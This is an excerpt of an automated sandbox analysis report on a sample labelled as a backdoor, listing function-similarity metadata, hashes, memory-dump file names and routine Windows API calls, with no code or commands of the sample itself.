                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Dload$Section$LockObtainProtect
                                                • String ID:
                                                • API String ID: 731663317-0
                                                • Opcode ID: d9976379ff42ee254f4bc24cf84daeb2dadfaa4fb26cadcd8fce0c9c4e4a3da2
                                                • Instruction ID: e3a4b1c03eb82de590a9d65893bd4c23c260a23911b725577e12c6fcfe25cd80
                                                • Opcode Fuzzy Hash: d9976379ff42ee254f4bc24cf84daeb2dadfaa4fb26cadcd8fce0c9c4e4a3da2
                                                • Instruction Fuzzy Hash: DAD0C9701022C08EC231EB6A9D5A75D2271B74C789F641A01A116C75B0EBAC4C82CA66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemShowWindow
                                                • String ID:
                                                • API String ID: 3351165006-0
                                                • Opcode ID: b9c57d7b26bdecc882f9bf3a480783279a3b6fad9ff7926b82cd435ea43fedfe
                                                • Instruction ID: 6bc647ad51ce7d160420573287918bcc398ebb209008c6035b3ab3114beb0e2c
                                                • Opcode Fuzzy Hash: b9c57d7b26bdecc882f9bf3a480783279a3b6fad9ff7926b82cd435ea43fedfe
                                                • Instruction Fuzzy Hash: B1C01232058200BECB020BB0ED09D2FBBA8BBE4212F05CD08B6A5C0060C23CC010DB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 7fb45f882d86e3fff3cc3db5ef4c12a4fe8a44b9b504f0d5ef1d587fae843e21
                                                • Instruction ID: 5c95f1c98a2cd4b47195e4a56438fe1138c24390483331ac80bf9f50e839f32d
                                                • Opcode Fuzzy Hash: 7fb45f882d86e3fff3cc3db5ef4c12a4fe8a44b9b504f0d5ef1d587fae843e21
                                                • Instruction Fuzzy Hash: 3FC1A270A04244AFEF15CF68C498BA97BB5EF4A310F5840BBEC45DB386DB399944CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: cac072b66403cf45271a981ca031236a9186c51d36ddabce035790f6134dd564
                                                • Instruction ID: af28aed8c85de2bb1cb8d6e95d248639dee8a03d2d2f9ceadef99c177d14a098
                                                • Opcode Fuzzy Hash: cac072b66403cf45271a981ca031236a9186c51d36ddabce035790f6134dd564
                                                • Instruction Fuzzy Hash: 2871C071204F44AEDB21DB70CC45AE7B7F9AF18301F44495FE5AB87282DA396A48CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D8384
                                                  • Part of subcall function 007D1380: __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D1380: new.LIBCMT ref: 007D13FE
                                                  • Part of subcall function 007D19A6: __EH_prolog.LIBCMT ref: 007D19AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: c7a733c0db98d3e07713348f5c0f547fe6a87aa03be9221c9ec151df61bff7cc
                                                • Instruction ID: a3b7cc2eee7d09eff5d814263dca8df3e164b02c3a02318ec80810c31ac5f2e2
                                                • Opcode Fuzzy Hash: c7a733c0db98d3e07713348f5c0f547fe6a87aa03be9221c9ec151df61bff7cc
                                                • Instruction Fuzzy Hash: 1C41C231840694DADF60DB60CC59BEA73B8AF54300F4444EBE58AA7293DF785EC8DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D1E05
                                                  • Part of subcall function 007D3B3D: __EH_prolog.LIBCMT ref: 007D3B42
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 998da38c0596dd1d8d1d342169aabd405d0acc6026914d688a320be779066839
                                                • Instruction ID: 6abcf79a934f52c6567f00f83e29098ad0b5fe1c5e7153feaead71093829a0a0
                                                • Opcode Fuzzy Hash: 998da38c0596dd1d8d1d342169aabd405d0acc6026914d688a320be779066839
                                                • Instruction Fuzzy Hash: AC212672905148EECB11EFA9D9469EEBBF6BF58300B50016EE845A7351CB3A5E10CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007EA7C8
                                                  • Part of subcall function 007D1380: __EH_prolog.LIBCMT ref: 007D1385
                                                  • Part of subcall function 007D1380: new.LIBCMT ref: 007D13FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 959f65231c14147918d2d6a0234193364f1436d92e1434364bb6f1346db600e4
                                                • Instruction ID: f8f00d6dfff81bd8f289a2ee7460f2a13e947ee4207acf4aa8a3bb18f13304f6
                                                • Opcode Fuzzy Hash: 959f65231c14147918d2d6a0234193364f1436d92e1434364bb6f1346db600e4
                                                • Instruction Fuzzy Hash: 24216B71C05289EACF15DF95C9569EEB7B4EF19300F4004AAE809A7242DB396E06CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 83bd2d51ec10666dee31d80ee797b4bfaf7cc6ffb97bb289e06d4f8cfb5f33b2
                                                • Instruction ID: 461821e39f73b1293f317001db50ae5cd5560a61d3fde5ab0cddfbd0980e64bb
                                                • Opcode Fuzzy Hash: 83bd2d51ec10666dee31d80ee797b4bfaf7cc6ffb97bb289e06d4f8cfb5f33b2
                                                • Instruction Fuzzy Hash: 24118E73A10529EBCF26AEA8CC459EEB736EF88750F054116FA05A7391DA388D10C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                • Instruction ID: 7b1e339da4986ca5214092e67300d272baf5d2f2d6cfe1c16b06f51420d39904
                                                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                • Instruction Fuzzy Hash: 7AF08C30500B06AFDB30DE65C945616BBF8FB65320F20CA1BE496C2780E778E880C742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D5BDC
                                                  • Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: 9c82357e86f39b9bdfd8b308046dc8670add8541c81ae8b695c34e04d947f556
                                                • Instruction ID: b42912083f2b82dd38a30eb6bee250cd85f1aa75d716400de5f64fb12ef29356
                                                • Opcode Fuzzy Hash: 9c82357e86f39b9bdfd8b308046dc8670add8541c81ae8b695c34e04d947f556
                                                • Instruction Fuzzy Hash: 9A016D34A05684DAC725F7A4C0593EDF7B49F5D700F40459EE85A53383CBB81B08C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ed2efb9f103d3634dc4d812c1404fbda4a7a9ef6f493f659dec874a1123c35a9
                                                • Instruction ID: 114f4f2f8c5dc3453ed5335b1ca3abeec16bb19725fc629de92ed22cc19a5b77
                                                • Opcode Fuzzy Hash: ed2efb9f103d3634dc4d812c1404fbda4a7a9ef6f493f659dec874a1123c35a9
                                                • Instruction Fuzzy Hash: 8DE0A02154412D9BEBA127695C05B7A278C9F817A0F150220BB14AB391CE288C1085A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007D968F,?,?,?,?,00801FA1,000000FF), ref: 007D96EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: dc5fa207aa6eaf4d40442ab67e87cadeedd7d9e8cad7d46cbd30f61dd5e8fdfe
                                                • Instruction ID: eafcca482a80ddb0ce25affcee1679e6bec07f27bb1f302bbbb5db8e08d7a762
                                                • Opcode Fuzzy Hash: dc5fa207aa6eaf4d40442ab67e87cadeedd7d9e8cad7d46cbd30f61dd5e8fdfe
                                                • Instruction Fuzzy Hash: C2F05E30556B048FDB308E24D949792B7F8AB12735F049B1F92E7536E0E769A88D8F10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007DA4F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: 0ece0e823886070d803618663103b25e38da7a124f9cae818efd7d1d362e8671
                                                • Instruction ID: 933b021f0f3001d789601adb7d3e5c8de54a4d975a106f4a82f3557cb69f8ae5
                                                • Opcode Fuzzy Hash: 0ece0e823886070d803618663103b25e38da7a124f9cae818efd7d1d362e8671
                                                • Instruction Fuzzy Hash: 13F0E9310097C0FBCA225B7848087C67BB07F15331F04CA0AF1FD02291C27D14959723
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetThreadExecutionState.KERNEL32(00000001), ref: 007E06B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ExecutionStateThread
                                                • String ID:
                                                • API String ID: 2211380416-0
                                                • Opcode ID: 4d4e1fd50a3353e7f2332d70320ed6e8d3db2a96d3a42bf316092abbc1a17d4c
                                                • Instruction ID: 4ad50bbc45293c42e958d82a3baa20064fc4dc2a5833990141addad05940be18
                                                • Opcode Fuzzy Hash: 4d4e1fd50a3353e7f2332d70320ed6e8d3db2a96d3a42bf316092abbc1a17d4c
                                                • Instruction Fuzzy Hash: 00D012256061D0A5D621336AAC0F7FE1B1A6FCAB10F094067B54E576C6CF9E08C656E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GdipAlloc.GDIPLUS(00000010), ref: 007E9D81
                                                  • Part of subcall function 007E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007E9B30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Gdip$AllocBitmapCreateFromStream
                                                • String ID:
                                                • API String ID: 1915507550-0
                                                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                • Instruction ID: 2beabee848120866d25a96a4a3e56e812cc884bc448fa994e4006b31d7443230
                                                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                • Instruction Fuzzy Hash: 04D0A73171624CFADF40FE768C0297E7BACEB08300F008025BE0886141EDB5DE10A261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileType.KERNELBASE(000000FF,007D9887), ref: 007D9995
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID:
                                                • API String ID: 3081899298-0
                                                • Opcode ID: 8f7c0bfaff0d5287e3773fef44f9466333a6ffb9d42194040aa8471e7333c437
                                                • Instruction ID: 0ab88b749b819da366c894c59c4a62ebd721d42cb358c65e3978d0fa83d88831
                                                • Opcode Fuzzy Hash: 8f7c0bfaff0d5287e3773fef44f9466333a6ffb9d42194040aa8471e7333c437
                                                • Instruction Fuzzy Hash: DAD01231011540A58F6146354E1A0997775DBC3366B38D6A9D165C41A1D737D803F541
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 007ED43F
                                                  • Part of subcall function 007EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
                                                  • Part of subcall function 007EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
